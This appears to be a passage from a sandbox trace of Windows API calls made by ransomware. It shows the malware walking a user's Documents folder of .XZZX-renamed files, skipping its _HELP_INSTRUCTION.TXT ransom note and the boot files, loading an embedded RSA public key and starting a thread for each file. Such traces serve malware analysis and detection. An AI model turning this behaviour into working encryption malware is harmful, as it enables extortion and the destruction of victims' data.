[0230.606] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="NTLDR") returned 0x0 [0230.606] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0230.606] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="ntdetect.com") returned 0x0 [0230.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0230.606] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0230.606] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0230.606] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.606] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" | out: lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" [0230.606] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.606] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x112c [0230.606] Sleep (dwMilliseconds=0x96) [0230.760] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0230.761] lstrcmpW (lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX", lpString2="..") returned 1 [0230.761] lstrcmpW (lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX", lpString2=".") returned 1 [0230.761] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0230.761] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="ntldr") returned 0x0 [0230.761] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="NTLDR") returned 0x0 [0230.761] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0230.761] StrStrW (lpFirst="B8F78CE2222013C8FF50021B265CF810.XZZX", lpSrch="ntdetect.com") returned 0x0 [0230.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0230.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0230.761] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0230.761] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.761] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B8F78CE2222013C8FF50021B265CF810.XZZX" | out: lpString1="B8F78CE2222013C8FF50021B265CF810.XZZX") returned="B8F78CE2222013C8FF50021B265CF810.XZZX" [0230.761] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1130 [0230.761] Sleep (dwMilliseconds=0x96) [0230.916] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0230.917] lstrcmpW (lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpString2="..") returned 1 [0230.917] lstrcmpW (lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpString2=".") returned 1 [0230.917] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0230.917] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="ntldr") returned 0x0 [0230.917] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="NTLDR") returned 0x0 [0230.917] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0230.917] StrStrW (lpFirst="BB3CCCBC286641FC324D4A8B2C932644.XZZX", lpSrch="ntdetect.com") returned 0x0 [0230.917] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0230.917] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0230.917] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0230.917] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.917] lstrcpyW (in: lpString1=0x17cf1c, lpString2="BB3CCCBC286641FC324D4A8B2C932644.XZZX" | out: lpString1="BB3CCCBC286641FC324D4A8B2C932644.XZZX") returned="BB3CCCBC286641FC324D4A8B2C932644.XZZX" [0230.917] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1134 [0230.917] Sleep (dwMilliseconds=0x96) [0231.075] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.075] lstrcmpW (lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX", lpString2="..") returned 1 [0231.075] lstrcmpW (lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX", lpString2=".") returned 1 [0231.075] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0231.075] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="ntldr") returned 0x0 [0231.075] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="NTLDR") returned 0x0 [0231.075] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0231.075] StrStrW (lpFirst="BE3510781871306D58A0B1081C6A14B5.XZZX", lpSrch="ntdetect.com") returned 0x0 [0231.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0231.075] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0231.075] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0231.076] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.076] lstrcpyW (in: lpString1=0x17cf1c, lpString2="BE3510781871306D58A0B1081C6A14B5.XZZX" | out: lpString1="BE3510781871306D58A0B1081C6A14B5.XZZX") returned="BE3510781871306D58A0B1081C6A14B5.XZZX" [0231.076] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0231.076] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1138 [0231.076] Sleep (dwMilliseconds=0x96) [0231.228] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.228] lstrcmpW (lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpString2="..") returned 1 [0231.228] lstrcmpW (lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpString2=".") returned 1 [0231.228] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0231.228] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="ntldr") returned 0x0 [0231.228] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="NTLDR") returned 0x0 [0231.229] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0231.229] StrStrW (lpFirst="D4132CC416066089C413F0DC1A1E44D1.XZZX", lpSrch="ntdetect.com") returned 0x0 [0231.229] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0231.229] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0231.229] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0231.229] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.229] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D4132CC416066089C413F0DC1A1E44D1.XZZX" | out: lpString1="D4132CC416066089C413F0DC1A1E44D1.XZZX") returned="D4132CC416066089C413F0DC1A1E44D1.XZZX" [0231.229] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0231.229] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x113c [0231.229] WaitForSingleObject (hHandle=0x113c, dwMilliseconds=0xffffffff) returned 0x0 [0231.230] Sleep (dwMilliseconds=0x96) [0231.384] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.384] lstrcmpW (lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpString2="..") returned 1 [0231.385] lstrcmpW (lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpString2=".") returned 1 [0231.385] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0231.385] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="ntldr") returned 0x0 [0231.385] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="NTLDR") returned 0x0 [0231.385] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0231.385] StrStrW (lpFirst="D7DDFDC32CF119C87B5BFA373108FE10.XZZX", lpSrch="ntdetect.com") returned 0x0 [0231.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0231.385] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0231.385] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0231.385] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.385] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" | out: lpString1="D7DDFDC32CF119C87B5BFA373108FE10.XZZX") returned="D7DDFDC32CF119C87B5BFA373108FE10.XZZX" [0231.385] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0231.385] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1140 [0231.385] Sleep (dwMilliseconds=0x96) [0231.541] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.541] lstrcmpW (lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX", lpString2="..") returned 1 [0231.541] lstrcmpW (lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX", lpString2=".") returned 1 [0231.541] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0231.541] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="ntldr") returned 0x0 [0231.541] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="NTLDR") returned 0x0 [0231.541] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0231.541] StrStrW (lpFirst="D8B4FBC032E124E029E6603236DA0928.XZZX", lpSrch="ntdetect.com") returned 0x0 [0231.541] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0231.541] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0231.541] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0231.541] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.541] lstrcpyW (in: lpString1=0x17cf1c, lpString2="D8B4FBC032E124E029E6603236DA0928.XZZX" | out: lpString1="D8B4FBC032E124E029E6603236DA0928.XZZX") returned="D8B4FBC032E124E029E6603236DA0928.XZZX" [0231.541] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0231.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1144 [0231.541] Sleep (dwMilliseconds=0x96) [0231.696] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0231.696] lstrcmpW (lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX", lpString2="..") returned 1 [0231.696] lstrcmpW (lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX", lpString2=".") returned 1 [0231.696] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0231.696] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="ntldr") returned 0x0 [0231.696] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="NTLDR") returned 0x0 [0231.697] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0231.697] StrStrW (lpFirst="E1CB2DE23002B20E4903A282342F9656.XZZX", lpSrch="ntdetect.com") returned 0x0 [0231.697] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="Desktop") returned 0x0 [0231.697] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0231.697] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0231.697] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0231.697] lstrcpyW (in: lpString1=0x17cf1c, lpString2="E1CB2DE23002B20E4903A282342F9656.XZZX" | out: lpString1="E1CB2DE23002B20E4903A282342F9656.XZZX") returned="E1CB2DE23002B20E4903A282342F9656.XZZX" [0231.697] lstrcpyW (in: 